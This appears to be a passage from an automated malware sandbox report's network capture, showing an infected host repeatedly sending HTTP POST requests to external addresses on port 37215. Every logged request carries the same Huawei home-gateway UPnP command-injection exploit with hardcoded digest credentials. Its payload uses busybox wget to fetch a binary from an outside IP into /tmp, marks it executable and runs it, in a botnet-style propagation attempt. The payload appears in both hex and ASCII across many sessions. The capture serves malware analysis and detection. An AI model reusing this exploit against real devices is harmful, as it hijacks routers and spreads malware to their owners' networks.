                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425842047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361541033 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:35.976857901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:06.951627016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      45192.168.2.1457338197.31.192.2237215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.595060110 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.926141977 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      46192.168.2.144366241.220.188.23437215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.596390009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      47192.168.2.1456774102.206.197.19737215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.597826958 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.926141977 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      48192.168.2.1441628102.47.188.22337215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.600487947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.930093050 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
